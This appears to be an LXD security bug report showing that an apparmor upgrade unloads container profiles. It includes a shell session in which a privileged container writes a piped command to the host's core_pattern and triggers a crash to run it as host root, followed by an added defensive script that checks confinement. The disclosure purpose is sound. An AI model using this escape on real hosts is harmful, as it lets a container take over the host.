Apparmor package upgrades unload all LXD apparmor profiles, making all LXD containers unconfined.
Example:
# Create an unprivileged and a privileged container
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc launch ubuntu:16.04 c1
Creating c1
Starting c1
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc launch ubuntu:16.04 c2 -c security.privileged=true
Creating c2
Starting c2
# Look at their apparmor profiles (expected values)
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c1 | grep Pid | sed "s/Pid: //g")/attr/current
lxd-c1_</var/lib/lxd>//&:lxd-c1_<var-lib-lxd>://unconfined (enforce)
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current
lxd-c2_</var/lib/lxd>//&:lxd-c2_<var-lib-lxd>://unconfined (enforce)
# Apply an apparmor upgrade
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ sudo apt upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
Calculating upgrade... Done
The following packages will be upgraded:
apparmor
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 493 kB of archives.
After this operation, 8,192 B of additional disk space will be used.
Do you want to continue? [Y/n]
Get:1 http://us.archive.ubuntu.com/ubuntu zesty/main amd64 apparmor amd64 2.11.0-2ubuntu1 [493 kB]
Fetched 493 kB in 0s (34.9 MB/s)
Preconfiguring packages ...
(Reading database ... 221457 files and directories currently installed.)
Preparing to unpack .../apparmor_2.11.0-2ubuntu1_amd64.deb ...
Unpacking apparmor (2.11.0-2ubuntu1) over (2.10.95-4ubuntu5.1) ...
Processing triggers for ureadahead (0.100.0-19) ...
Setting up apparmor (2.11.0-2ubuntu1) ...
Installing new version of config file /etc/apparmor.d/abstractions/X ...
Installing new version of config file /etc/apparmor.d/abstractions/authentication ...
Installing new version of config file /etc/apparmor.d/abstractions/base ...
Installing new version of config file /etc/apparmor.d/abstractions/dbus-session-strict ...
Installing new version of config file /etc/apparmor.d/abstractions/gnome ...
Installing new version of config file /etc/apparmor.d/abstractions/nameservice ...
Installing new version of config file /etc/apparmor.d/abstractions/php5 ...
Installing new version of config file /etc/apparmor.d/abstractions/samba ...
Installing new version of config file /etc/apparmor.d/abstractions/ssl_certs ...
Installing new version of config file /etc/apparmor.d/abstractions/ssl_keys ...
Installing new version of config file /etc/apparmor.d/abstractions/ubuntu-browsers ...
Installing new version of config file /etc/apparmor.d/abstractions/ubuntu-helpers ...
Installing new version of config file /etc/apparmor.d/abstractions/user-mail ...
update-rc.d: warning: start and stop actions are no longer supported; falling back to defaults
Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd
Skipping profile in /etc/apparmor.d/disable: usr.sbin.sssd
Processing triggers for systemd (232-18ubuntu1) ...
Processing triggers for man-db (2.7.6.1-1) ...
# And look at the now unconfined containers
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c1 | grep Pid | sed "s/Pid: //g")/attr/current
unconfined//&:lxd-c1_<var-lib-lxd>://unconfined
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current
unconfined//&:lxd-c2_<var-lib-lxd>://unconfined
# The LXD profiles are also entirely gone
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ ls /sys/kernel/security/apparmor/policy/profiles/ | grep lxd
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$
# And to confirm that apparmor is in fact gone
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc exec c2 bash
root@c2:~# mount -t proc proc /mnt
root@c2:~# echo "|/usr/bin/touch /pwned" > /mnt/sys/kernel/core_pattern
root@c2:~# sleep 30&
[1] 468
root@c2:~# kill -SIGSEGV $!
root@c2:~#
[1]+ Segmentation fault (core dumped) sleep 30
root@c2:~# exit
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ ls -lh /pwned
-rw-rw-rw- 1 root root 0 Mar 1 03:37 /pwned
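As an added defender-side check, not part of the original report, the POSIX sh script below applies the same two probes the session above uses, `/proc/<pid>/attr/current` and the `lxd-*` entries under `/sys/kernel/security/apparmor/policy/profiles`, to every running container so that it can be run right after an apparmor package upgrade. The function names, the `lxc list -c n --format csv` invocation and the `--run` flag are assumptions of mine. A label counts as confined only when it starts with the container's own `lxd-<name>_` profile and ends in `(enforce)`: the unconfined label still mentions `lxd-c1_<var-lib-lxd>` further along the stack, so a plain grep for `lxd-` would miss the regression.

```shell
#!/bin/sh
# Added example, not from the original report. Checks that running LXD
# containers are still confined by their own AppArmor profile after an
# apparmor package upgrade. Run as root on the LXD host (reading
# /proc/<pid>/attr/current of another user's process needs that).

# Return 0 when a label read from /proc/<pid>/attr/current shows the
# container confined by its "lxd-<name>_" profile in enforce mode.
# $1 = container name, $2 = label line. The unconfined label seen after
# the upgrade ("unconfined//&:lxd-c1_<var-lib-lxd>://unconfined") starts
# with "unconfined" and carries no "(enforce)", so it is rejected.
lxd_label_confined() {
    name="$1"
    label="$2"
    case "$label" in
        "lxd-${name}_"*"(enforce)") return 0 ;;
        *) return 1 ;;
    esac
}

# Return 0 when at least one loaded kernel profile name starts with "lxd-".
# $1 = directory to scan; normally
# /sys/kernel/security/apparmor/policy/profiles, parameterised for testing.
lxd_profiles_loaded() {
    dir="$1"
    for p in "$dir"/lxd-*; do
        [ -e "$p" ] && return 0
    done
    return 1
}

# Walk every container on this host and report the unconfined ones.
# Returns 0 when all are confined, 1 when any is not, 2 when the lxc
# client is missing. The csv listing format is assumed, not taken from
# the report; the "Pid:" line of "lxc info" is the one the session uses.
check_all_containers() {
    command -v lxc >/dev/null 2>&1 || return 2
    rc=0
    if ! lxd_profiles_loaded /sys/kernel/security/apparmor/policy/profiles; then
        echo "WARNING: no lxd-* profiles loaded in the kernel"
        rc=1
    fi
    for name in $(lxc list -c n --format csv); do
        pid=$(lxc info "$name" | sed -n 's/^Pid: //p')
        [ -n "$pid" ] || continue            # stopped container, nothing to check
        label=$(cat "/proc/$pid/attr/current" 2>/dev/null)
        if lxd_label_confined "$name" "$label"; then
            echo "OK         $name  $label"
        else
            echo "UNCONFINED $name  $label"
            rc=1
        fi
    done
    return $rc
}

# Usage: sh lxd-apparmor-check.sh --run
if [ "${1:-}" = "--run" ]; then
    check_all_containers
    exit $?
fi
```

On a host in the state shown above the script prints one `UNCONFINED` line per container plus the missing-profiles warning and exits 1, which makes it usable as a post-upgrade hook or a periodic check that alerts on the regression instead of waiting for a container to notice it.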
This was originally reported (though not as a security issue) here: https://github.com/lxc/lxd/issues/2981